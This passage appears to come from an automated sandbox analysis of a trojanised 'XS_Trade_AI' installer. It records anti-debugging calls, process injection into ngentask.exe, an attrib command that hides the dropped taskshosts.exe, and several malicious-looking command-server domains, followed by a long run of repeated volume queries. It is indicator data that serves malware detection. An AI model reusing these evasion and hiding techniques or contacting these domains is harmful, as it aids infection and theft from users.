      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Code function: 15_2_00693987 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_00693987
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe | Code function: 6_2_002F8180 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 6_2_002F8180
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Code function: 15_2_0069A500 mov eax, dword ptr fs:[00000030h] 15_2_0069A500
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Code function: 15_2_006927A5 mov eax, dword ptr fs:[00000030h] 15_2_006927A5
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Code function: 16_2_0069A500 mov eax, dword ptr fs:[00000030h] 16_2_0069A500
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Code function: 16_2_006927A5 mov eax, dword ptr fs:[00000030h] 16_2_006927A5
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Code function: 15_2_0069AD03 GetProcessHeap, 15_2_0069AD03
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Code function: 15_2_0068A075 SetUnhandledExceptionFilter, 15_2_0068A075
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Code function: 15_2_00689986 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 15_2_00689986
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Code function: 15_2_00689EE1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_00689EE1
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Code function: 16_2_0068A075 SetUnhandledExceptionFilter, 16_2_0068A075
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Code function: 16_2_00693987 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00693987
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Code function: 16_2_00689986 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_00689986
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Code function: 16_2_00689EE1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00689EE1

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 protect: page execute and read and write
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 value starts with: 4D5A
      Source: taskshosts.exe, 00000010.00000003.1973874499.000000000A353000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: servicedny.site
      Source: taskshosts.exe, 00000010.00000003.1973874499.000000000A353000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: authorisev.site
      Source: taskshosts.exe, 00000010.00000003.1973874499.000000000A353000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: faulteyotk.site
      Source: taskshosts.exe, 00000010.00000003.1973874499.000000000A353000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: dilemmadu.site
      Source: taskshosts.exe, 00000010.00000003.1973874499.000000000A353000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: contemteny.site
      Source: taskshosts.exe, 00000010.00000003.1973874499.000000000A353000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: goalyfeastz.site
      Source: taskshosts.exe, 00000010.00000003.1973874499.000000000A353000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: opposezmny.site
      Source: taskshosts.exe, 00000010.00000003.1973874499.000000000A353000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: seallysl.site
      Source: taskshosts.exe, 00000010.00000003.1973874499.000000000A353000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: revordirecut.cyou
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 401000
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 446000
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 449000
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 459000
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 683008
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Process created: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe "C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe" /verysilent /sp-
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\attrib.exe attrib +H +S "C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe"
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Process created: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe C:\Users\user\AppData\Local\programs\common\taskshosts.exe C:\Windows\system32\config\systemprofile\AppData\Local\programs\common\taskshosts.exe
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exe
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Process created: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe C:\Users\user\AppData\Local\programs\common\taskshosts.exe
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exe
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1828839852.00000000035D0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: BShell_TrayWndTrayNotifyWnd
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe | Code function: 6_2_003158F0 cpuid 6_2_003158F0
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformation
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Queries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformation
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Queries volume information: C:\Users\user\AppData\Local\Programs\Common VolumeInformation
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\_ctypes.pyd VolumeInformation
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\_socket.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\select.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\_uuid.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\_hashlib.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\_ctypes.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
